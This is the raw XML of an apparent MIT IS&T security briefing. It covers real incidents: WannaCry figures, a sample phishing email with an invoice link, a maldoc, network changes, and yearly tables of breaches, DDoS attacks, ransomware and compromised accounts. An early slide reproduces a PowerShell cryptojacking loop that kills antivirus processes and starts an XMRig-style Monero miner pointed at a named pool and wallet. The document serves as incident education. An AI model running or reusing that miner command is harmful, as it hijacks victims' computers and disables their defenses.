                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ErrorAction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SilentlyContinue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)) { echo "Not running"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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ddg.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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yam1.exe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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>miner.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xmrig.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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nscpucnminer32.exe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1e.exe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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iie.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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3.exe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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iee.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ie.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>je.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ie.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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im360sd.exe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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iexplorer.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>imzhudongfangyu.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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360tray.exe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360rp.exe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360rps.exe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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>taskkill</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /IM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pe.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /C $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>env:TMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>me.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> --donate-level=1 -k -a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cryptonight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stratum+tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://monerohash.com:5555 -u 41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-p x } else { echo "Running" } Start-Sleep 55 }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F3BF31-C148-024D-8436-18D62848EF17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6258296" y="2434442"/>
            <a:ext cx="427512" cy="1341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23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F20E-B36C-D946-A909-451784D8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 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WannaCry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> at MIT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8AAAB8-A53C-A548-A93E-5F43B70A5B32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="866187" y="1631612"/>
            <a:ext cx="79162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err="1"/>
              <a:t>Ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> campaign spread using an exploit of Windows SMB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Compromised computers scanned nearby hosts to spread quickly  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Patch for vulnerability was available 59 days before the attack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Exploits released four weeks before the attack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8372B-4345-1045-8D5C-78DE306562BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4730131" y="3306266"/>
            <a:ext cx="3014131" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="158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~239 MIT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>machines affected to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1A669-950A-E541-9243-6FBBA55B3624}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1363796" y="3317541"/>
            <a:ext cx="3014131" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="158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400,000 systems worldwide on May 12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" baseline="30000" dirty="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> 2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="wannacry.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5338CA96-3F9C-7B49-ADB6-2BC3643AB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" y="5017530"/>
            <a:ext cx="9144000" cy="13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5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6" y="1334708"/>
            <a:ext cx="5588054" cy="5686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887" y="1656680"/>
            <a:ext cx="3832577" cy="473368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Return-Path: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>zedal.eingang@tsu-muencheberg.de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Received: from 10.0.0.5 (cm221-85.liwest.at [81.10.221.85]) by alfa3043.alfahosting-server.de (Postfix) with ESMTPSA id 44B5330F4001 for ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Mon, 18 Sep 2017 19:01:28 +0200 (CEST)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Hi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;Full Name of MIT Research Scientist&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>,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Couldn’t get through to you at you phone number today. Please get back to me, preferably until the rest of the day about on the status of this invoice below.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Invoice issue:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>pbuilding.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>/Invoice-9195/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&lt;Full Name of MIT Research Scientist&gt;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/>
              <a:t>Thanks,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&lt;Name of Lab Manager/Research Associate&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="188078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Example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Massachusetts Institute of Technology, IS&amp;T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4F62-00B0-0E49-BBA0-CC97FDD87B97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vpn_phishing_em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19" y="1820335"/>
            <a:ext cx="4814460" cy="4397021"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="vpn_phisihing_b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9" y="1293286"/>
            <a:ext cx="4304403" cy="53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68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A398-DC3C-3143-8E81-F772E094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Maldoc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CrowdStrike</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> v Sophos AV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2C5E20-E377-9149-9003-574C27EC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72" y="1690689"/>
            <a:ext cx="5307528" cy="72987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67106-732C-EA41-891A-60D8B6CE7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3700"/>
            <a:ext cx="5001794" cy="42929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E39838-94AD-1A4F-9C84-0EDC900CF7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096" r="58180" b="32987"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="475013" y="6056630"/>
            <a:ext cx="7866301" cy="726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CFFCF9-41E4-1349-B9AD-A104FF876164}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="95003" y="273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80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D3295-98F6-BA4F-966F-A4D8E42E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Generation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MITnet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EAAC-B840-C04C-81DE-7FE7FDC74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18.0.0.0/8 -&gt; 18.0.0.0/9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dual-stack IPv4/IPv6 architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Faculty, students, and staff assigned public IPv4 addresses by default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buildings numbered 18.128.x.x and above before June 2018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ist.mit.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/network/next-gen-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mitnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>faq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6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92F1-7DC1-A14B-8DBE-3CE0063C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at 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2DEF3-BF98-E147-B707-A074DE6F1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security incidents at MIT </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Real world examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Next Generation of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MITnet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58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6EF336-4109-A047-B045-1C2EBEB94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471" y="196850"/>
            <a:ext cx="8275973" cy="6661150"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31070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C3CC-0353-D943-8BC4-0E20C6AB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36ADD-0E33-5F4F-B101-91BE74B10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7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7875-D729-4048-9976-30695D31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3B480-63A5-5748-AA61-D697FE766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79" y="1873126"/>
            <a:ext cx="7886700" cy="435133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A5C240A4-2AE9-9143-83AD-1413BCBF0E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681947"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="137972" y="1594266"/>
          <a:ext cx="8824514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332">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4146321687"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1230159">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1815659142"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1283885">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3755140407"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="126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 Breach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0 incidents (requiring</a:t>
                      </a:r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 notification to the AG</a:t>
                      </a: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2 incidents (requiring</a:t>
                      </a:r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 notification to the AG</a:t>
                      </a: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</a:rPr>
                        <a:t>1 incident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(requiring</a:t>
                      </a:r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 notification to the AG</a:t>
                      </a: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Security awareness; Encryption; Two-factor-authentication (2FA-Duo)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Vulnerability scans; Audits; Data-loss-prevention (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
                        <a:t>CloudLock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Spirion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Incident analysis (DIRT); Additional controls</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" baseline="0" dirty="0"/>
                        <a:t> &amp;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t> training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DDoS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0 major attacks; ; no impact on </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="953735"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MITnet</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="953735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8 major attacks; no impact on </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="953735"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MITnet</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="953735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4 major attacks; 30 seconds downtime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Cloud-based </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
                        <a:t>DDoS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t> mitigation service (Akamai </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
                        <a:t>Prolexic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Automated notification from Akamai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Akamai filters out all of the malicious traffic (total protection for </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
                        <a:t>MITnet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Compromised Hosts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15,000 attempts/day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(62 devices quarantined)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39,000</a:t>
                      </a:r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 attempts/day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(15 Raspberry </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="953735"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Pis</a:t>
                      </a:r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 compromised)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="953735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26,000 attempts/day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(19 successful; 18 academic &amp; 1 residential)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Security awareness; Two-factor-authentication (2FA-Duo);</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" baseline="0" dirty="0"/>
                        <a:t> D</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>evice firewalls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Intrusion detection systems (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
                        <a:t>Sourcefire</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>, Bro); Notification from REN-ISAC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Identify system owner and notify (semi-automated); Quarantine the</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" baseline="0" dirty="0"/>
                        <a:t> host’s address,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t> if necessary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Malware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4 malware injections blocked/day;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8,000 virus injections blocked/day</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="953735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8</a:t>
                      </a:r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 malware injections blocked/day; 8,000 virus injections blocked/day</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="953735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10 malware injections blocked/day;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8,000 virus injections blocked/day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Anti-malware (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
                        <a:t>Crowdstrike</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>); Anti-virus (Sophos); Device firewalls; Security awareness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Alerts from CrowdStrike</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" baseline="0" dirty="0"/>
                        <a:t>,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t> Sophos,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" baseline="0" dirty="0"/>
                        <a:t> &amp;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t> Intrusion detection systems; Reports from </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
                        <a:t>Bitsight</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" baseline="0" dirty="0"/>
                        <a:t> &amp;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t> REN-ISAC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Identify system owner and notify (semi-automated); Quarantine the</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" baseline="0" dirty="0"/>
                        <a:t> host’s address,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t> if necessary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6E6438C-C693-D648-BBC6-AEA935B82764}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="137973" y="1261304"/>
            <a:ext cx="137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Incident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EC744-BB0E-DB4A-8E5F-B7338E345432}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5192243" y="1249313"/>
            <a:ext cx="1209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Protection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D01032-2F46-5546-A6EF-AF27D2B07C56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6375421" y="1260318"/>
            <a:ext cx="138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Detection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38A7E-637A-4743-BE11-F0D7153E3957}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7577973" y="1249313"/>
            <a:ext cx="136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Response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8E1397-FC53-294D-9574-A27780D8BC68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2518241" y="1249313"/>
            <a:ext cx="135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71BE9-75E2-D44B-BFD3-352FD81378CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3862924" y="1252781"/>
            <a:ext cx="135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2016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022392-D884-AD4B-8301-4000510829D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1320135" y="1235665"/>
            <a:ext cx="135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2018 Q1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="365445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717F-7E08-154C-ABE3-FC976975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7969-825F-6A46-8188-3BD7A08C1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A0F9077-9658-4D44-A5DC-E0EDE250B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280884"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="128531" y="1690688"/>
          <a:ext cx="8769427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207">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2569287993"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1361371">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1815659142"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1327821">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3755140407"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="12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Ransomware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7 incidents; no ransoms</a:t>
                      </a:r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 paid </a:t>
                      </a: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&amp; no reported data lost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245 incidents; no ransoms</a:t>
                      </a:r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 paid </a:t>
                      </a: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&amp; no reported data lost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14 incidents; no ransoms paid &amp; no data lost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Security awareness; Anti-malware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Crowdstrike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Alerts</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" baseline="0" dirty="0"/>
                        <a:t> from </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
                        <a:t>Crowdstrike</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>Reports from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Restore from system &amp; data backups (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
                        <a:t>Crashplan</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t> &amp; Dropbox)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Phishing or Social Engineering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16 user accounts compromised; 11 affiliates, 3 staff, 2 students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25 user accounts compromised; 1 faculty, 10 staff, 11 students</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="953735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16 user accounts compromised; 2</a:t>
                      </a:r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 faculty, 10 staff &amp; 4 students</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="953735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Phishing awareness;</a:t>
